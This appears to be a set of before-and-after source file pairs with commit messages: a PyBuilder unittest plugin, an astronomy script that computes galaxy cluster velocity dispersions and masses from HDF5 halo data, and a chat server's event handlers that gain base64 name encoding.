    """Run all test modules under *test_source* whose filenames end in *suffix*.

    Thin convenience wrapper: turns the suffix into a glob and delegates to
    execute_tests_matching.
    """
    file_glob = "*{0}".format(suffix)
    return execute_tests_matching(logger, test_source, file_glob, test_method_prefix)
def execute_tests_matching(logger, test_source, file_glob, test_method_prefix=None):
    """Discover test modules under *test_source* matching *file_glob* and run them.

    :return: tuple of (unittest result object, captured console output string)
    """
    output_log_file = StringIO()
    try:
        test_modules = discover_modules_matching(test_source, file_glob)
        # Use a fresh loader instead of unittest.defaultTestLoader: assigning
        # testMethodPrefix on the shared default loader would leak the custom
        # prefix into every later user of that loader in the same process.
        loader = unittest.TestLoader()
        if test_method_prefix:
            loader.testMethodPrefix = test_method_prefix
        tests = loader.loadTestsFromNames(test_modules)
        result = TestNameAwareTextTestRunner(logger, output_log_file).run(tests)
        return result, output_log_file.getvalue()
    finally:
        # Always release the in-memory buffer, even when discovery/loading raises.
        output_log_file.close()
def _register_test_and_source_path_and_return_test_dir(project, system_path):
    """Prepend the unittest and main source directories to *system_path*.

    After the two inserts the main source directory is first, the test
    directory second.  Returns the expanded test directory path.
    """
    test_dir = project.expand_path("$dir_source_unittest_python")
    system_path.insert(0, test_dir)
    system_path.insert(0, project.expand_path("$dir_source_main_python"))
    return test_dir
def write_report(name, project, logger, result, console_out):
    """Persist the raw console output plus a JSON summary of *result*, and
    forward per-test outcomes to the CI server."""
    project.write_report("%s" % name, console_out)
    report = {"tests-run": result.testsRun,
              "errors": [],
              "failures": []}
    # unittest stores errors/failures as (test, traceback-string) pairs.
    for error in result.errors:
        report["errors"].append({"test": error[0].id(),
                                 "traceback": error[1]})
        logger.error("Test has error: %s", error[0].id())
        if project.get_property("verbose"):
            print_text_line(error[1])
    for failure in result.failures:
        report["failures"].append({"test": failure[0].id(),
                                   "traceback": failure[1]})
        logger.error("Test failed: %s", failure[0].id())
        if project.get_property("verbose"):
            print_text_line(failure[1])
    project.write_report("%s.json" % name, render_report(report))
    report_to_ci_server(project, result)
def report_to_ci_server(project, result):
    """Report each executed test to the CI server; failed tests carry the
    reason recorded by TestNameAwareTestResult."""
    for test_name in result.test_names:
        with test_proxy_for(project).and_test_name(test_name) as test:
            if test_name in result.failed_test_names_and_reasons:
                test.fails(result.failed_test_names_and_reasons.get(test_name))
Encode exception text properly

We cannot assume that the exception text is ASCII, so simply interpolating
the exception into a string might fail. Encoding the exception text as
UTF-8 fixes the problem described by @schlomo and thus resolves #121.
# -*- coding: utf-8 -*-
#
# This file is part of PyBuilder
#
# Copyright 2011-2015 PyBuilder Team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
try:
from StringIO import StringIO
except ImportError as e:
from io import StringIO
import sys
import unittest
from pybuilder.core import init, task, description, use_plugin
from pybuilder.errors import BuildFailedException
from pybuilder.utils import discover_modules_matching, render_report
from pybuilder.ci_server_interaction import test_proxy_for
from pybuilder.terminal import print_text_line
use_plugin("python.core")

# unittest renamed _TextTestResult to TextTestResult in Python 2.7; alias the
# private 2.6 name so the rest of this module can use a single name.
if sys.version_info < (2, 7):
    TextTestResult = unittest._TextTestResult  # brought to you by 2.6
else:
    TextTestResult = unittest.TextTestResult
class TestNameAwareTextTestRunner(unittest.TextTestRunner):
    """TextTestRunner that threads a PyBuilder logger through to its result object."""

    def __init__(self, logger, stream):
        self.logger = logger
        super(TestNameAwareTextTestRunner, self).__init__(stream=stream)

    def _makeResult(self):
        # Hook called by unittest.TextTestRunner.run() to build the result object.
        return TestNameAwareTestResult(self.logger, self.stream, self.descriptions, self.verbosity)
class TestNameAwareTestResult(TextTestResult):
    """Test result that records every started test and, for failing or
    erroring tests, a human-readable reason keyed by the test instance."""

    def __init__(self, logger, stream, descriptions, verbosity):
        self.test_names = []
        self.failed_test_names_and_reasons = {}
        self.logger = logger
        super(TestNameAwareTestResult, self).__init__(stream, descriptions, verbosity)

    def startTest(self, test):
        self.test_names.append(test)
        self.logger.debug("starting %s", test)
        super(TestNameAwareTestResult, self).startTest(test)

    def addError(self, test, err):
        exception_type, exception, traceback = err
        # NOTE(review): encode("utf-8") assumes ``exception`` is a text string.
        # An exception *instance* has no encode(); and on Python 3 encoding
        # would embed a bytes repr (b'...') in the message -- confirm this is
        # only ever reached with Python 2 text values.
        self.failed_test_names_and_reasons[test] = '{0}: {1}'.format(exception_type, exception.encode("utf-8")).replace('\'', '')
        super(TestNameAwareTestResult, self).addError(test, err)

    def addFailure(self, test, err):
        exception_type, exception, traceback = err
        # Same UTF-8 concern as addError above.
        self.failed_test_names_and_reasons[test] = '{0}: {1}'.format(exception_type, exception.encode("utf-8")).replace('\'', '')
        super(TestNameAwareTestResult, self).addFailure(test, err)
@init
def init_test_source_directory(project):
    """PyBuilder @init hook: register default properties for unittest discovery.

    Defaults are only applied when the build script has not already set them.
    """
    project.set_property_if_unset("dir_source_unittest_python", "src/unittest/python")
    project.set_property_if_unset("unittest_module_glob", "*_tests")
    project.set_property_if_unset("unittest_file_suffix", None)  # deprecated, use unittest_module_glob.
    project.set_property_if_unset("unittest_test_method_prefix", None)
@task
@description("Runs unit tests based on Python's unittest module")
def run_unit_tests(project, logger):
    """PyBuilder task: discover and execute unittest modules, then write reports.

    Raises BuildFailedException when any test errors/fails, or when a test
    module cannot even be imported.
    """
    test_dir = _register_test_and_source_path_and_return_test_dir(project, sys.path)
    unittest_file_suffix = project.get_property("unittest_file_suffix")
    if unittest_file_suffix is not None:
        # Legacy property: translate the old file suffix into a module glob.
        logger.warn("unittest_file_suffix is deprecated, please use unittest_module_glob")
        module_glob = "*{0}".format(unittest_file_suffix)
        if module_glob.endswith(".py"):
            # Module names never carry the .py extension.
            WITHOUT_DOT_PY = slice(0, -3)
            module_glob = module_glob[WITHOUT_DOT_PY]
        project.set_property("unittest_module_glob", module_glob)
    else:
        module_glob = project.get_property("unittest_module_glob")
    logger.info("Executing unittest Python modules in %s", test_dir)
    logger.debug("Including files matching '%s'", module_glob)
    try:
        test_method_prefix = project.get_property("unittest_test_method_prefix")
        result, console_out = execute_tests_matching(logger, test_dir, module_glob, test_method_prefix)
        if result.testsRun == 0:
            logger.warn("No unittests executed.")
        else:
            logger.info("Executed %d unittests", result.testsRun)
        write_report("unittest", project, logger, result, console_out)
        if not result.wasSuccessful():
            raise BuildFailedException("There were %d test error(s) and %d failure(s)"
                                       % (len(result.errors), len(result.failures)))
        logger.info("All unittests passed.")
    except ImportError as e:
        # Point the user at the exact file/line whose import failed instead of
        # only the opaque ImportError message.
        import traceback
        _, _, import_error_traceback = sys.exc_info()
        file_with_error, error_line, _, statement_causing_error = traceback.extract_tb(import_error_traceback)[-1]
        logger.error("Import error in unittest file {0}, due to statement '{1}' on line {2}".format(
            file_with_error, statement_causing_error, error_line))
        logger.error("Error importing unittests: %s", e)
        raise BuildFailedException("Unable to execute unit tests.")
def execute_tests(logger, test_source, suffix, test_method_prefix=None):
    """Run all test modules under *test_source* whose filenames end in *suffix*."""
    return execute_tests_matching(logger, test_source, "*{0}".format(suffix), test_method_prefix)
def execute_tests_matching(logger, test_source, file_glob, test_method_prefix=None):
    """Discover test modules under *test_source* matching *file_glob* and run them.

    :return: tuple of (unittest result object, captured console output string)
    """
    output_log_file = StringIO()
    try:
        test_modules = discover_modules_matching(test_source, file_glob)
        # Use a fresh loader instead of unittest.defaultTestLoader: assigning
        # testMethodPrefix on the shared default loader would leak the custom
        # prefix into every later user of that loader in the same process.
        loader = unittest.TestLoader()
        if test_method_prefix:
            loader.testMethodPrefix = test_method_prefix
        tests = loader.loadTestsFromNames(test_modules)
        result = TestNameAwareTextTestRunner(logger, output_log_file).run(tests)
        return result, output_log_file.getvalue()
    finally:
        # Always release the in-memory buffer, even when discovery/loading raises.
        output_log_file.close()
def _register_test_and_source_path_and_return_test_dir(project, system_path):
    """Prepend the unittest and main source directories to *system_path*.

    After the two inserts the main source directory is first, the test
    directory second.  Returns the expanded test directory path.
    """
    test_dir = project.expand_path("$dir_source_unittest_python")
    system_path.insert(0, test_dir)
    system_path.insert(0, project.expand_path("$dir_source_main_python"))
    return test_dir
def write_report(name, project, logger, result, console_out):
    """Persist the raw console output plus a JSON summary of *result*, and
    forward per-test outcomes to the CI server."""
    project.write_report("%s" % name, console_out)
    report = {"tests-run": result.testsRun,
              "errors": [],
              "failures": []}
    # unittest stores errors/failures as (test, traceback-string) pairs.
    for error in result.errors:
        report["errors"].append({"test": error[0].id(),
                                 "traceback": error[1]})
        logger.error("Test has error: %s", error[0].id())
        if project.get_property("verbose"):
            print_text_line(error[1])
    for failure in result.failures:
        report["failures"].append({"test": failure[0].id(),
                                   "traceback": failure[1]})
        logger.error("Test failed: %s", failure[0].id())
        if project.get_property("verbose"):
            print_text_line(failure[1])
    project.write_report("%s.json" % name, render_report(report))
    report_to_ci_server(project, result)
def report_to_ci_server(project, result):
    """Report each executed test to the CI server; failed tests carry the
    reason recorded by TestNameAwareTestResult."""
    for test_name in result.test_names:
        with test_proxy_for(project).and_test_name(test_name) as test:
            if test_name in result.failed_test_names_and_reasons:
                test.fails(result.failed_test_names_and_reasons.get(test_name))
|
import h5py as hdf
from addHaloInfo import find_indices
from astLib import astStats
import numpy as np
from calc_cluster_props import findLOSV, findClusterCenterRedshift, calc_mass_Saro
# silly stuff
import sys
import time
def spinning_cursor():
    """Endlessly yield the four terminal spinner frames: | / - \\ ."""
    frames = '|/-\\'
    index = 0
    while True:
        yield frames[index]
        index = (index + 1) % len(frames)
spinner = spinning_cursor()
# Load the halo catalog (first dataset in the HDF5 file).
with hdf.File('out1204878_halo.hdf5', 'r') as f:
    dset = f[f.keys()[0]]  # NOTE(review): py2 idiom; f.keys() is a view on py3
    data = dset.value      # NOTE(review): h5py's dset.value is deprecated; dset[()] preferred
# now we need to make a mask for the data -- HETDEX DEPTH!!!
# Select massive (M200/h >= 1e13), low-redshift halos whose galaxies are
# detectable either photometrically (g < 22) or via OII flux.
mask1 = (data['M200']/0.72 >= 1e13) & (data['Z'] < 0.5)
mask2 = (data['g'] < 22.) | (data['Oii'] > 3.5)
mask = mask1 & mask2
# we'll use the mask to make all the changes and then consolidate back.
dataMasked = data[mask]
#dataMasked = data
# Group galaxies by their parent halo id; find_indices returns, per halo id,
# the index list of its member galaxies.
hids = np.unique(dataMasked['HALOID'])
halos = find_indices(dataMasked['HALOID'], hids)
for i,h in enumerate(halos):
    if len(h) < 5:
        # Too few members for velocity statistics; flag with -1 sentinels.
        dataMasked['CLUSZ'][h] = -1.
        dataMasked['LOSV'][h] = -1.
        dataMasked['LOSVD'][h] = -1.
    elif 5 <= len(h) < 15:
        # Small groups: the gapper estimator is more robust at low N.
        dataMasked[h] = findClusterCenterRedshift(dataMasked[h])
        dataMasked[h] = findLOSV(dataMasked[h])
        dataMasked['LOSVD'][h] =\
            astStats.gapperEstimator(dataMasked['LOSV'][h])
    elif 15 <= len(h):
        #find the cluster redshifts
        dataMasked[h] = findClusterCenterRedshift(dataMasked[h])
        #find the LOSV
        dataMasked[h] = findLOSV(dataMasked[h])
        # find the LOSVD -- biweight scale estimator for richer systems
        dataMasked['LOSVD'][h] =\
            astStats.biweightScale_test(dataMasked['LOSV'][h],
                                        tuningConstant=9.0)
    # Only compute a mass when a cluster redshift was actually assigned.
    if not dataMasked['CLUSZ'][h][0] == -1.0:
        # finally the mass
        dataMasked['MASS'][h] = calc_mass_Saro(dataMasked[h])
    else:
        pass
    sys.stdout.write(spinner.next())  # NOTE(review): Python 2 only; use next(spinner) on py3
    sys.stdout.flush()
    sys.stdout.write('\b')
# now we make another new file
#with hdf.File('out1204878_complete.hdf5', 'w') as f:
with hdf.File('out1204878_hetdex.hdf5', 'w') as f:
    # data[mask] = dataMasked
    f['dset_complete'] = dataMasked
    f.flush()
Rework to not rely on haloinfo

This will change again in the future to make it a more stand-alone
tool.
import h5py as hdf
from addHaloInfo import find_indices
from astLib import astStats
import numpy as np
from calc_cluster_props import findLOSV, findClusterCenterRedshift, calc_mass_Saro
def updateArray(data):
    """Append the result columns CLUSZ, LOSV, LOSVD and MASS to *data*.

    Each new field is a '>f4' column initialised to -1, the "not computed"
    sentinel used throughout this script.  Call exactly once per catalog;
    a second call would duplicate the field names.

    :param data: numpy structured array (the galaxy catalog)
    :return: a new structured array with the four extra fields
    """
    from numpy.lib import recfunctions as rfns
    # print() works on both Python 2 and 3; the old print statement was py2-only.
    print('update array...')
    newData = -np.ones(len(data))
    data = rfns.append_fields(data, ['CLUSZ', 'LOSV', 'LOSVD', 'MASS'],
                              [newData, newData, newData, newData],
                              dtypes='>f4', usemask=False)
    return data
# silly stuff
import sys
import time
def spinning_cursor():
    """Endlessly yield the four terminal spinner frames: | / - \\ ."""
    while True:
        yield '|'
        yield '/'
        yield '-'
        yield '\\'
spinner = spinning_cursor()
# Load the full galaxy catalog (first dataset in the HDF5 file) and add the
# empty result columns.
#with hdf.File('out1204878_halo.hdf5', 'r') as f:
with hdf.File('out1204878_allGalaxies.hdf5', 'r') as f:
    dset = f[f.keys()[0]]  # NOTE(review): py2 idiom; f.keys() is a view on py3
    data = dset.value      # NOTE(review): h5py's dset.value is deprecated; dset[()] preferred
    data = updateArray(data)
# now we need to make a mask for the data -- HETDEX DEPTH!!!
#mask1 = (data['M200']/0.72 >= 1e13) & (data['Z'] < 0.5)
#mask2 = (data['g'] < 22.) | (data['Oii'] > 3.5)
#mask = mask1 & mask2
# we'll use the mask to make all the changes and then consolidate back.
#dataMasked = data[mask]
# Masking disabled in this version: process every galaxy.
dataMasked = data
# Group galaxies by their parent halo id; find_indices returns, per halo id,
# the index list of its member galaxies.
hids = np.unique(dataMasked['HALOID'])
halos = find_indices(dataMasked['HALOID'], hids)
for i,h in enumerate(halos):
    if len(h) < 5:
        # Too few members for velocity statistics; flag with -1 sentinels.
        dataMasked['CLUSZ'][h] = -1.
        dataMasked['LOSV'][h] = -1.
        dataMasked['LOSVD'][h] = -1.
    elif 5 <= len(h) < 15:
        # Small groups: the gapper estimator is more robust at low N.
        dataMasked[h] = findClusterCenterRedshift(dataMasked[h])
        dataMasked[h] = findLOSV(dataMasked[h])
        dataMasked['LOSVD'][h] =\
            astStats.gapperEstimator(dataMasked['LOSV'][h])
    elif 15 <= len(h):
        #find the cluster redshifts
        dataMasked[h] = findClusterCenterRedshift(dataMasked[h])
        #find the LOSV
        dataMasked[h] = findLOSV(dataMasked[h])
        # find the LOSVD -- biweight scale estimator for richer systems
        dataMasked['LOSVD'][h] =\
            astStats.biweightScale_test(dataMasked['LOSV'][h],
                                        tuningConstant=9.0)
    # Only compute a mass when a cluster redshift was actually assigned.
    if not dataMasked['CLUSZ'][h][0] == -1.0:
        # finally the mass
        dataMasked['MASS'][h] = calc_mass_Saro(dataMasked[h])
    else:
        pass
    sys.stdout.write(spinner.next())  # NOTE(review): Python 2 only; use next(spinner) on py3
    sys.stdout.flush()
    sys.stdout.write('\b')
# now we make another new file
#with hdf.File('out1204878_complete.hdf5', 'w') as f:
#with hdf.File('out1204878_hetdex.hdf5', 'w') as f:
with hdf.File('out1204878_allGalaxies_props.hdf5', 'w') as f:
    # data[mask] = dataMasked
    f['dset_complete'] = dataMasked
    f.flush()
|
#!/usr/bin/env python
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Union
from uuid import uuid4 as uuid
from activitystreams.models.activity import Activity
from dino.config import ApiTargets
from dino.config import ErrorCodes as ECodes
from dino.hooks import *
__author__ = 'Oscar Eriksson <oscar@thenetcircle.com>'
logger = logging.getLogger(__name__)
def connect() -> (int, None):
    """
    connect to the server; emits the 'on_connect' event to registered hooks

    :return: {'status_code': 200}
    """
    environ.env.observer.emit('on_connect', (None, None))
    return ECodes.OK, None
def on_login(data: dict, activity: Activity) -> (int, Union[str, None]):
    """
    event sent directly after a connection has successfully been made, to get the user_id for this connection

    :param data: activity streams format, needs actor.id (user id) and actor.summary (user name)
    :param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
    :return: if ok: {'status_code': 200}, else: {'status_code': 400, 'data': '<some error message>'}
    """
    environ.env.observer.emit('on_login', (data, activity))
    return ECodes.OK, None
def on_delete(data: dict, activity: Activity):
    """
    handle a delete event (presumably message deletion -- confirm against the
    registered 'on_delete' hooks)

    :param data: activity streams format
    :param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
    :return: {'status_code': 200}
    """
    environ.env.observer.emit('on_delete', (data, activity))
    return ECodes.OK, None
def on_message(data, activity: Activity):
    """
    send any kind of message/event to a target user/room

    object.url: target channel_id
    target.id: target room_id
    actor.id: sender user_id
    actor.url: sender room_id

    :param data: activity streams format, must include target.id (room/user id) and object.url (channel id)
    :param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
    :return: {'status_code': ECodes.OK, 'data': '<same AS as client sent, plus timestamp>'}
    """
    room_id = activity.target.id
    from_room_id = activity.actor.url
    # only if cross-room should we broadcast the origin room id with the activity; less confusion for clients
    # (i.e. when origin and target room are the same, drop actor.url from the payload)
    if from_room_id is not None and from_room_id == room_id:
        del data['actor']['url']
    if activity.target.object_type == 'room':
        # room message: resolve room and channel display names
        activity.target.display_name = utils.get_room_name(activity.target.id)
        activity.object.summary = utils.get_channel_name(activity.object.url)
    else:
        # private message: target is a user, no channel applies
        activity.target.display_name = utils.get_user_name_for(activity.target.id)
        activity.object.summary = ''
        activity.object.url = ''
    activity.actor.summary = environ.env.session.get(SessionKeys.user_name.value)
    # Mirror the resolved names back onto the raw payload the clients receive.
    data['actor']['summary'] = activity.actor.summary
    data['target']['displayName'] = activity.target.display_name
    data['object']['summary'] = activity.object.summary
    environ.env.observer.emit('on_message', (data, activity))
    return ECodes.OK, data
def on_ban(data: dict, activity: Activity) -> (int, Union[str, None]):
    """
    ban a user from a room (if user is an owner/admin/moderator)

    target.id: the uuid of the room that the user is in
    target.displayName: the room name
    object.id: the id of the user to kick
    object.content: the name of the user to kick
    object.summary: the ban time, e.g.
    actor.id: the id of the kicker
    actor.content: the name of the kicker

    :param data: activity streams format
    :param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
    :return: if ok: {'status_code': 200}, else: {'status_code': 400, 'data': '<error message>'}
    """
    environ.env.observer.emit('on_ban', (data, activity))
    # a ban also triggers the kick hooks, so the banned user is removed from the room
    environ.env.observer.emit('on_kick', (data, activity))
    return ECodes.OK, None
def on_kick(data: dict, activity: Activity) -> (int, None):
    """
    kick a user from a room (if user is an owner)

    target.id: the uuid of the room that the user is in
    target.displayName: the room name
    object.id: the id of the user to kick
    object.content: the name of the user to kick
    actor.id: the id of the kicker
    actor.content: the name of the kicker

    :param data: activity streams format
    :param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
    :return: if ok: {'status_code': 200}, else: {'status_code': 400, 'data': '<error message>'}
    """
    environ.env.observer.emit('on_kick', (data, activity))
    return ECodes.OK, None
def on_whisper(data: dict, activity: Activity) -> (int, None):
    """
    whisper to another person in the same room; only that person will receive the event, so it
    functions as a private message

    :param data: activity streams format
    :param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
    :return: if ok: {'status_code': 200}, else: {'status_code': 400, 'data': '<error message>'}
    """
    environ.env.observer.emit('on_whisper', (data, activity))
    return ECodes.OK, None
def on_invite(data: dict, activity: Activity) -> (int, None):
    """
    invite a user to a room this user is in

    :param data: activity streams format
    :param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
    :return: if ok: {'status_code': 200}, else: {'status_code': 400, 'data': '<error message>'}
    """
    environ.env.observer.emit('on_invite', (data, activity))
    return ECodes.OK, None
def on_request_admin(data: dict, activity: Activity) -> (int, None):
    """
    request the presence of an admin in the current room

    :param data: activity streams format
    :param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
    :return: if ok: {'status_code': 200}, else: {'status_code': 400, 'data': '<error message>'}
    """
    environ.env.observer.emit('on_request_admin', (data, activity))
    return ECodes.OK, None
def on_create(data: dict, activity: Activity) -> (int, dict):
    """
    create a new room

    :param data: activity streams format, must include target.display_name (room name) and object.id (channel id)
    :param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
    :return: if ok: {'status_code': ECodes.OK, 'data': '<same AS as in the request, with addition of target.id (generated UUID
    for the new room>'}, else: {'status_code': 400, 'data': '<error message>'}
    """
    # generate a uuid for this room and mirror it onto the raw payload, so the
    # hooks and the client response both see the new room id
    activity.target.id = str(uuid())
    data['target']['id'] = activity.target.id
    environ.env.observer.emit('on_create', (data, activity))
    return ECodes.OK, data
def on_set_acl(data: dict, activity: Activity) -> (int, Union[str, None]):
    """
    change ACL of a room; only allowed if the user is the owner of the room

    :param data: activity streams, acls as attachments to object with object_type as acl name and content as acl value
    :param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
    :return: if ok: {'status_code': 200}, else: {'status_code': 400, 'data': '<some error message>'}
    """
    environ.env.observer.emit('on_set_acl', (data, activity))
    return ECodes.OK, None
def on_get_acl(data: dict, activity: Activity) -> (int, Union[str, dict]):
    """
    get the ACLs of a room or channel (the docstring previously said "change"; the code only reads)

    :param data: activity streams format
    :param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
    :return: if ok: {'status_code': 200}, else: {'status_code': 400, 'data': '<AS with acl as object.attachments>'}
    """
    # target.object_type decides whether channel- or room-level ACLs are fetched
    if activity.target.object_type == ApiTargets.CHANNEL:
        acls = utils.get_acls_for_channel(activity.target.id)
    else:
        acls = utils.get_acls_for_room(activity.target.id)
    environ.env.observer.emit('on_get_acl', (data, activity))
    return ECodes.OK, utils.activity_for_get_acl(activity, acls)
def on_status(data: dict, activity: Activity) -> (int, Union[str, None]):
    """
    change online status

    :param data: activity streams format, needs actor.id (user id), actor.summary (user name) and verb
    (online/invisible/offline)
    :param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
    :return: if ok: {'status_code': 200}, else: {'status_code': 400, 'data': '<some error message>'}
    """
    environ.env.observer.emit('on_status', (data, activity))
    return ECodes.OK, None
def on_history(data: dict, activity: Activity) -> (int, Union[str, None]):
    """
    get the history of a room

    the 'updated' field is optional, and if set history since that point will be returned (only if dino has been
    configured with the history type 'unread' instead of 'top')

    :param data: activity streams format
    :param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
    :return: if ok: {'status_code': 200}, else: {'status_code': 400, 'data': '<some error message>'}
    """
    room_id = activity.target.id
    user_id = activity.actor.id
    last_read = activity.updated  # optional cutoff; see docstring
    messages = utils.get_history_for_room(room_id, user_id, last_read)
    environ.env.observer.emit('on_history', (data, activity))
    return ECodes.OK, utils.activity_for_history(activity, messages)
def on_join(data: dict, activity: Activity) -> (int, Union[str, None]):
    """
    join a room

    :param data: activity streams format, need actor.id (user id), target.id (user id), actor.summary (user name)
    :param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
    :return: if ok: {'status_code': 200}, else: {'status_code': 400, 'data': '<some error message>'}
    """
    # todo: how to deal with invisibility here?
    room_id = activity.target.id
    user_id = activity.actor.id
    last_read = activity.updated
    # Gather everything the joining client needs in one response:
    # history, owners, ACLs and the current member list.
    messages = utils.get_history_for_room(room_id, user_id, last_read)
    owners = utils.get_owners_for_room(room_id)
    acls = utils.get_acls_for_room(room_id)
    users = utils.get_users_in_room(room_id)
    environ.env.observer.emit('on_join', (data, activity))
    return ECodes.OK, utils.activity_for_join(activity, acls, messages, owners, users)
def on_users_in_room(data: dict, activity: Activity) -> (int, Union[dict, str]):
    """
    get a list of users in a room

    :param data: activity streams format, need target.id (room id)
    :param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
    :return: if ok, {'status_code': ECodes.OK, 'data': <AS with users as object.attachments>}
    """
    # TODO: should people not in the room be able to list users in the room?
    room_id = activity.target.id
    users = utils.get_users_in_room(room_id)
    environ.env.observer.emit('on_users_in_room', (data, activity))
    return ECodes.OK, utils.activity_for_users_in_room(activity, users)
def on_list_rooms(data: dict, activity: Activity) -> (int, Union[dict, str]):
    """
    get a list of rooms for a channel

    :param data: activity streams format, needs actor.id (user id) and object.url (channel id)
    :param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
    :return: if ok, {'status_code': ECodes.OK, 'data': <AS with rooms as object.attachments>}
    """
    # note: the channel id is read from object.url, not object.id
    channel_id = activity.object.url
    rooms = environ.env.db.rooms_for_channel(channel_id)
    environ.env.observer.emit('on_list_rooms', (data, activity))
    return ECodes.OK, utils.activity_for_list_rooms(activity, rooms)
def on_list_channels(data: dict, activity: Activity) -> (int, Union[dict, str]):
    """
    get a list of channels

    :param data: activity streams format, needs actor.id (user id)
    :param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
    :return: if ok, {'status_code': ECodes.OK, 'data': <AS with channels as object.attachments>}
    """
    channels = environ.env.db.get_channels()
    environ.env.observer.emit('on_list_channels', (data, activity))
    return ECodes.OK, utils.activity_for_list_channels(activity, channels)
def on_leave(data: dict, activity: Activity) -> (int, Union[str, None]):
    """
    leave a room

    :param data: activity streams format, needs actor.id (user id), actor.summary (user name), target.id (room id)
    :param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
    :return: if ok: {'status_code': 200}, else: {'status_code': 400, 'data': '<some error message>'}
    """
    environ.env.observer.emit('on_leave', (data, activity))
    return ECodes.OK, None
def on_disconnect() -> (int, None):
    """
    when a client disconnects or the server no longer gets a ping response from the client

    :return: if ok: {'status_code': 200}
    """
    environ.env.observer.emit('on_disconnect', (None, None))
    return ECodes.OK, None
Base64-encode room/channel/user names in the gn_message response
#!/usr/bin/env python
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Union
from uuid import uuid4 as uuid
from activitystreams.models.activity import Activity
from dino.config import ApiTargets
from dino.config import ErrorCodes as ECodes
from dino.utils import b64e
from dino.hooks import *
__author__ = 'Oscar Eriksson <oscar@thenetcircle.com>'
logger = logging.getLogger(__name__)
def connect() -> (int, None):
    """
    connect to the server; emits the 'on_connect' event to registered hooks

    :return: {'status_code': 200}
    """
    environ.env.observer.emit('on_connect', (None, None))
    return ECodes.OK, None
def on_login(data: dict, activity: Activity) -> (int, Union[str, None]):
    """
    event sent directly after a connection has successfully been made, to get the user_id for this connection

    :param data: activity streams format, needs actor.id (user id) and actor.summary (user name)
    :param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
    :return: if ok: {'status_code': 200}, else: {'status_code': 400, 'data': '<some error message>'}
    """
    environ.env.observer.emit('on_login', (data, activity))
    return ECodes.OK, None
def on_delete(data: dict, activity: Activity):
    """
    handle a delete event (presumably message deletion -- confirm against the
    registered 'on_delete' hooks)

    :param data: activity streams format
    :param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
    :return: {'status_code': 200}
    """
    environ.env.observer.emit('on_delete', (data, activity))
    return ECodes.OK, None
def on_message(data, activity: Activity):
    """
    send any kind of message/event to a target user/room

    object.url: target channel_id
    target.id: target room_id
    actor.id: sender user_id
    actor.url: sender room_id

    :param data: activity streams format, must include target.id (room/user id) and object.url (channel id)
    :param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
    :return: {'status_code': ECodes.OK, 'data': '<same AS as client sent, plus timestamp>'}
    """
    room_id = activity.target.id
    from_room_id = activity.actor.url
    # only if cross-room should we broadcast the origin room id with the activity; less confusion for clients
    # (i.e. when origin and target room are the same, drop actor.url from the payload)
    if from_room_id is not None and from_room_id == room_id:
        del data['actor']['url']
    if activity.target.object_type == 'room':
        # room message: resolve room and channel display names
        activity.target.display_name = utils.get_room_name(activity.target.id)
        activity.object.summary = utils.get_channel_name(activity.object.url)
    else:
        # private message: target is a user, no channel applies
        activity.target.display_name = utils.get_user_name_for(activity.target.id)
        activity.object.summary = ''
        activity.object.url = ''
    activity.actor.summary = environ.env.session.get(SessionKeys.user_name.value)
    # Names are base64-encoded in the payload so non-ASCII names survive transport.
    data['actor']['summary'] = b64e(activity.actor.summary)
    data['target']['displayName'] = b64e(activity.target.display_name)
    data['object']['summary'] = b64e(activity.object.summary)
    environ.env.observer.emit('on_message', (data, activity))
    return ECodes.OK, data
def on_ban(data: dict, activity: Activity) -> (int, Union[str, None]):
    """
    ban a user from a room (if user is an owner/admin/moderator)

    target.id: the uuid of the room that the user is in
    target.displayName: the room name
    object.id: the id of the user to kick
    object.content: the name of the user to kick
    object.summary: the ban time, e.g.
    actor.id: the id of the kicker
    actor.content: the name of the kicker

    :param data: activity streams format
    :param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
    :return: if ok: {'status_code': 200}, else: {'status_code': 400, 'data': '<error message>'}
    """
    environ.env.observer.emit('on_ban', (data, activity))
    # a ban also triggers the kick hooks, so the banned user is removed from the room
    environ.env.observer.emit('on_kick', (data, activity))
    return ECodes.OK, None
